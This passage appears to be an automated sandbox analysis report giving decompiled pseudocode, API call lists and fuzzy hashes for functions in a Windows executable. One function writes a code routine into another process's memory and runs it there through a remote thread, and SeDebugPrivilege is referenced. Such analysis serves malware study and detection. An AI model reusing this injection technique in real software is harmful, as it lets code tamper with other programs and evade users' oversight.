                                                                                                                • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                                • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004056B5(signed int __ecx, void* __eflags, signed int* _a4, signed short* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed short* _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				intOrPtr _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				char _v52;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed short* _t68;
                                                                                                                				signed short _t72;
                                                                                                                				intOrPtr _t80;
                                                                                                                				void* _t82;
                                                                                                                				void* _t85;
                                                                                                                				intOrPtr _t90;
                                                                                                                				signed int _t101;
                                                                                                                				intOrPtr _t102;
                                                                                                                				void** _t104;
                                                                                                                				signed short* _t106;
                                                                                                                				signed int* _t107;
                                                                                                                				signed int _t110;
                                                                                                                
                                                                                                                				_t94 = __ecx;
                                                                                                                				_t101 = 0;
                                                                                                                				_v32 = 0x22;
                                                                                                                				_v16 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				_v24 = 1;
                                                                                                                				_v8 = 0;
                                                                                                                				_v48 = 0;
                                                                                                                				_v36 = 0;
                                                                                                                				_v44 = 0;
                                                                                                                				_v40 = 0x100;
                                                                                                                				_v52 = 0;
                                                                                                                				_t68 = E004054B9(_a4);
                                                                                                                				_t106 = _a8;
                                                                                                                				if( *_t106 == 0) {
                                                                                                                					L31:
                                                                                                                					_t107 = _a4;
                                                                                                                					L32:
                                                                                                                					_t102 =  *((intOrPtr*)(_t107 + 0x1c));
                                                                                                                					 *((intOrPtr*)(_t107 + 0x30)) = _t102;
                                                                                                                					E004055D1(_t68,  &_v52);
                                                                                                                					return _t102;
                                                                                                                				}
                                                                                                                				_v28 = _t106;
                                                                                                                				do {
                                                                                                                					_t72 =  *_v28 & 0x0000ffff;
                                                                                                                					if(_t72 != 0x20 || _v8 != 0) {
                                                                                                                						if(_t72 == 0x22 || _t72 == 0x27) {
                                                                                                                							if(_v8 != 0) {
                                                                                                                								if(_t72 != _v32) {
                                                                                                                									goto L14;
                                                                                                                								}
                                                                                                                								_v8 = _v8 ^ 0x00000001;
                                                                                                                								goto L25;
                                                                                                                							}
                                                                                                                							_v32 = _t72 & 0x0000ffff;
                                                                                                                							_v8 = 1;
                                                                                                                							goto L25;
                                                                                                                						} else {
                                                                                                                							L14:
                                                                                                                							if(_t101 != 0) {
                                                                                                                								L24:
                                                                                                                								E0040559A( &_v52, _t101);
                                                                                                                								 *((short*)(_v36 + _t101 * 2)) =  *_v28 & 0x0000ffff;
                                                                                                                								_t106 = _a8;
                                                                                                                								_t101 = _t101 + 1;
                                                                                                                								_v12 = _t101;
                                                                                                                								L25:
                                                                                                                								_v24 = 0;
                                                                                                                								goto L26;
                                                                                                                							}
                                                                                                                							if(_t72 == 0x20) {
                                                                                                                								goto L25;
                                                                                                                							}
                                                                                                                							_t104 = _a4 + 0x20;
                                                                                                                							if(_v16 >= 0) {
                                                                                                                								_t110 = _v16;
                                                                                                                								_t82 = _t104[2];
                                                                                                                								if(_t110 != 0xffffffff) {
                                                                                                                									E00404951( &(_t104[1]), _t110, _t104, 4, _t82);
                                                                                                                								} else {
                                                                                                                									free( *_t104);
                                                                                                                								}
                                                                                                                								_t85 = _t110 + 1;
                                                                                                                								if(_t104[3] < _t85) {
                                                                                                                									_t104[3] = _t85;
                                                                                                                								}
                                                                                                                								_t94 = _v20;
                                                                                                                								 *((intOrPtr*)( *_t104 + _t110 * 4)) = _v20;
                                                                                                                							}
                                                                                                                							_t101 = _v12;
                                                                                                                							goto L24;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						if(_v24 == 0) {
                                                                                                                							E0040559A( &_v52, _t101);
                                                                                                                							_t90 = _v36;
                                                                                                                							 *((short*)(_t90 + _t101 * 2)) = 0;
                                                                                                                							if(_t90 == 0) {
                                                                                                                								_t90 = 0x40c4e8;
                                                                                                                							}
                                                                                                                							E004054DF(_a4, _t94, _t90); // executed
                                                                                                                							_v16 = _v16 + 1;
                                                                                                                							_v24 = 1;
                                                                                                                							_v12 = 0;
                                                                                                                							_t101 = 0;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L26:
                                                                                                                					_v20 = _v20 + 1;
                                                                                                                					_t68 = _t106 + _v20 * 2;
                                                                                                                					_v28 = _t68;
                                                                                                                				} while ( *_t68 != 0);
                                                                                                                				if(_t101 <= 0) {
                                                                                                                					goto L31;
                                                                                                                				}
                                                                                                                				E0040559A( &_v52, _t101);
                                                                                                                				_t80 = _v36;
                                                                                                                				 *((short*)(_t80 + _t101 * 2)) = 0;
                                                                                                                				if(_t80 == 0) {
                                                                                                                					_t80 = 0x40c4e8;
                                                                                                                				}
                                                                                                                				_t107 = _a4;
                                                                                                                				_t68 = E004054DF(_t107, _t94, _t80);
                                                                                                                				goto L32;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                  • Part of subcall function 004054B9: free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                                                  • Part of subcall function 004054B9: free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                                                  • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                • free.MSVCRT(?,00000000,?,00000000), ref: 004057A5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID: "
                                                                                                                • API String ID: 1294909896-123907689
                                                                                                                • Opcode ID: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                                                • Instruction ID: 1409d80bf75a77decaa3a1a55a0e2bac06d52b88a1a49f7bf6fe6aa810a6aee9
                                                                                                                • Opcode Fuzzy Hash: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                                                • Instruction Fuzzy Hash: 7F511675D00619EBCB20EF99C8805AEB7B5FF44314F50807BE945B7290D738AA42DF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004054B9(intOrPtr* __esi) {
                                                                                                                
                                                                                                                				free( *(__esi + 0x10));
                                                                                                                				free( *(__esi + 0xc)); // executed
                                                                                                                				 *((intOrPtr*)(__esi)) = 0;
                                                                                                                				 *((intOrPtr*)(__esi + 4)) = 0;
                                                                                                                				 *(__esi + 0xc) = 0;
                                                                                                                				 *(__esi + 0x10) = 0;
                                                                                                                				 *((intOrPtr*)(__esi + 0x1c)) = 0;
                                                                                                                				 *((intOrPtr*)(__esi + 8)) = 0;
                                                                                                                				return 0;
                                                                                                                			}




                                                                                                                APIs
                                                                                                                • free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                                                • free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                                • Instruction ID: 7665469e3ee5729aacaba78e143212aa4928b7d925741869fd88885e7d369011
                                                                                                                • Opcode Fuzzy Hash: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                                • Instruction Fuzzy Hash: C2D0A2B1515B018ED7B5DF39E405506BBF1EF083143108D7E90AED2A51E735A5549F48
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				void* _t8;
                                                                                                                				void* _t13;
                                                                                                                
                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
                                                                                                                				_t13 = _t8;
                                                                                                                				if(_v8 != 0) {
                                                                                                                					FreeLibrary(_v8);
                                                                                                                				}
                                                                                                                				return _t13;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                  • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 187924719-0
                                                                                                                • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                                • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr* _t6;
                                                                                                                				void* _t8;
                                                                                                                				struct HINSTANCE__** _t10;
                                                                                                                
                                                                                                                				_t10 = __eax;
                                                                                                                				E00409921(__eax);
                                                                                                                				_t6 =  *((intOrPtr*)(_t10 + 0x10));
                                                                                                                				if(_t6 == 0) {
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
                                                                                                                				return _t8;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$FileModuleName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859505661-0
                                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004095DA(signed int* __edi) {
                                                                                                                				void* __esi;
                                                                                                                				struct HINSTANCE__* _t3;
                                                                                                                				signed int* _t7;
                                                                                                                
                                                                                                                				_t7 = __edi;
                                                                                                                				_t3 =  *__edi;
                                                                                                                				if(_t3 != 0) {
                                                                                                                					FreeLibrary(_t3); // executed
                                                                                                                					 *__edi =  *__edi & 0x00000000;
                                                                                                                				}
                                                                                                                				E004099D4( &(_t7[0xa]));
                                                                                                                				return E004099D4( &(_t7[6]));
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                                • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                                                                
                                                                                                                				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
                                                                                                                				return 1;
                                                                                                                			}




                                                                                                                APIs
                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: EnumNamesResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3334572018-0
                                                                                                                • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                                • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004055D1(void* __eax, signed int* __esi) {
                                                                                                                				void* _t7;
                                                                                                                				signed int* _t9;
                                                                                                                
                                                                                                                				_t9 = __esi;
                                                                                                                				_t7 = __eax;
                                                                                                                				if(__esi[4] != 0) {
                                                                                                                					free(__esi[4]); // executed
                                                                                                                					__esi[4] = __esi[4] & 0x00000000;
                                                                                                                				}
                                                                                                                				_t9[2] = _t9[2] & 0x00000000;
                                                                                                                				 *_t9 =  *_t9 & 0x00000000;
                                                                                                                				return _t7;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                • free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                                                • Instruction ID: d9e56b4edb5911b8eb4629cf82416adf3d5ef3fa420fba14bebf6bcebba5d7e5
                                                                                                                • Opcode Fuzzy Hash: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                                                • Instruction Fuzzy Hash: FEC00272420B01DBE7355F21D8093A6B3F1FB1032BFA04E6E90A6148E1C7BCA58CCA48
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                C-Code - Quality: 70%
                                                                                                                			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
                                                                                                                				char _v8;
                                                                                                                				long _v12;
                                                                                                                				long _v16;
                                                                                                                				long _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				long _v28;
                                                                                                                				char _v564;
                                                                                                                				char _v16950;
                                                                                                                				char _v33336;
                                                                                                                				_Unknown_base(*)()* _v33348;
                                                                                                                				_Unknown_base(*)()* _v33352;
                                                                                                                				void _v33420;
                                                                                                                				void _v33432;
                                                                                                                				void _v33436;
                                                                                                                				intOrPtr _v66756;
                                                                                                                				intOrPtr _v66760;
                                                                                                                				void _v66848;
                                                                                                                				void _v66852;
                                                                                                                				void* __edi;
                                                                                                                				void* _t76;
                                                                                                                				_Unknown_base(*)()* _t84;
                                                                                                                				_Unknown_base(*)()* _t87;
                                                                                                                				void* _t90;
                                                                                                                				signed int _t126;
                                                                                                                				struct HINSTANCE__* _t128;
                                                                                                                				intOrPtr* _t138;
                                                                                                                				void* _t140;
                                                                                                                				void* _t144;
                                                                                                                				void* _t147;
                                                                                                                				void* _t148;
                                                                                                                
                                                                                                                				E0040B550(0x10524, __ecx);
                                                                                                                				_t138 = _a4;
                                                                                                                				_v12 = 0;
                                                                                                                				 *_t138 = 0;
                                                                                                                				_t76 = OpenProcess(0x1f0fff, 0, _a8);
                                                                                                                				_a8 = _t76;
                                                                                                                				if(_t76 == 0) {
                                                                                                                					 *_t138 = GetLastError();
                                                                                                                					L30:
                                                                                                                					return _v12;
                                                                                                                				}
                                                                                                                				_v33436 = 0;
                                                                                                                				memset( &_v33432, 0, 0x8284);
                                                                                                                				_t148 = _t147 + 0xc;
                                                                                                                				_t128 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                				_v8 = 0;
                                                                                                                				E00409C70( &_v8);
                                                                                                                				_push("CreateProcessW");
                                                                                                                				_push(_t128);
                                                                                                                				if(_v8 == 0) {
                                                                                                                					_t84 = GetProcAddress();
                                                                                                                				} else {
                                                                                                                					_t84 = _v8();
                                                                                                                				}
                                                                                                                				_v33352 = _t84;
                                                                                                                				E00409C70( &_v8);
                                                                                                                				_push("GetLastError");
                                                                                                                				_push(_t128);
                                                                                                                				if(_v8 == 0) {
                                                                                                                					_t87 = GetProcAddress();
                                                                                                                				} else {
                                                                                                                					_t87 = _v8();
                                                                                                                				}
                                                                                                                				_t140 = _a28;
                                                                                                                				_v33348 = _t87;
                                                                                                                				if(_t140 != 0) {
                                                                                                                					_t126 = 0x11;
                                                                                                                					memcpy( &_v33420, _t140, _t126 << 2);
                                                                                                                					_t148 = _t148 + 0xc;
                                                                                                                				}
                                                                                                                				_v33420 = 0x44;
                                                                                                                				if(_a16 == 0) {
                                                                                                                					_v33336 = 1;
                                                                                                                				} else {
                                                                                                                					E00404923(0x2000,  &_v33336, _a16);
                                                                                                                				}
                                                                                                                				if(_a12 == 0) {
                                                                                                                					_v16950 = 1;
                                                                                                                				} else {
                                                                                                                					E00404923(0x2000,  &_v16950, _a12);
                                                                                                                				}
                                                                                                                				if(_a24 == 0) {
                                                                                                                					_v564 = 1;
                                                                                                                				} else {
                                                                                                                					E00404923(0x104,  &_v564, _a24);
                                                                                                                				}
                                                                                                                				_v24 = _a20;
                                                                                                                				_v28 = 0;
                                                                                                                				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
                                                                                                                				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
                                                                                                                				_a12 = _t90;
                                                                                                                				if(_a16 == 0 || _t90 == 0) {
                                                                                                                					 *_a4 = GetLastError();
                                                                                                                				} else {
                                                                                                                					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
                                                                                                                					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
                                                                                                                					_v20 = 0;
                                                                                                                					_v16 = 0;
                                                                                                                					_a24 = 0;
                                                                                                                					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
                                                                                                                					_a28 = _t144;
                                                                                                                					if(_t144 == 0) {
                                                                                                                						 *_a4 = GetLastError();
                                                                                                                					} else {
                                                                                                                						ResumeThread(_t144);
                                                                                                                						WaitForSingleObject(_t144, 0x7d0);
                                                                                                                						CloseHandle(_t144);
                                                                                                                					}
                                                                                                                					_v66852 = 0;
                                                                                                                					memset( &_v66848, 0, 0x8284);
                                                                                                                					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
                                                                                                                					VirtualFreeEx(_a8, _a16, 0, 0x8000);
                                                                                                                					VirtualFreeEx(_a8, _a12, 0, 0x8000);
                                                                                                                					if(_a28 != 0) {
                                                                                                                						 *_a4 = _v66756;
                                                                                                                						_v12 = _v66760;
                                                                                                                						if(_a32 != 0) {
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if(_v20 != 0) {
                                                                                                                						FreeLibrary(_v20);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				goto L30;
                                                                                                                			}


































                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                                • memset.MSVCRT ref: 0040A4B3
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                                  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                                  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                                • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                                • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                                • memset.MSVCRT ref: 0040A66E
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                                • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                                • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                                • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                                • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                                • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                                • API String ID: 1572607441-20550370
                                                                                                                • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                                • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                                                                				struct tagPOINT _v12;
                                                                                                                				void* __esi;
                                                                                                                				void* _t47;
                                                                                                                				struct HBRUSH__* _t56;
                                                                                                                				void* _t61;
                                                                                                                				unsigned int _t63;
                                                                                                                				void* _t68;
                                                                                                                				struct HWND__* _t69;
                                                                                                                				struct HWND__* _t70;
                                                                                                                				void* _t73;
                                                                                                                				unsigned int _t74;
                                                                                                                				struct HWND__* _t76;
                                                                                                                				struct HWND__* _t77;
                                                                                                                				struct HWND__* _t78;
                                                                                                                				struct HWND__* _t79;
                                                                                                                				unsigned int _t85;
                                                                                                                				struct HWND__* _t87;
                                                                                                                				struct HWND__* _t89;
                                                                                                                				struct HWND__* _t90;
                                                                                                                				struct tagPOINT _t96;
                                                                                                                				struct tagPOINT _t98;
                                                                                                                				signed short _t103;
                                                                                                                				void* _t106;
                                                                                                                				void* _t117;
                                                                                                                
                                                                                                                				_t106 = __edx;
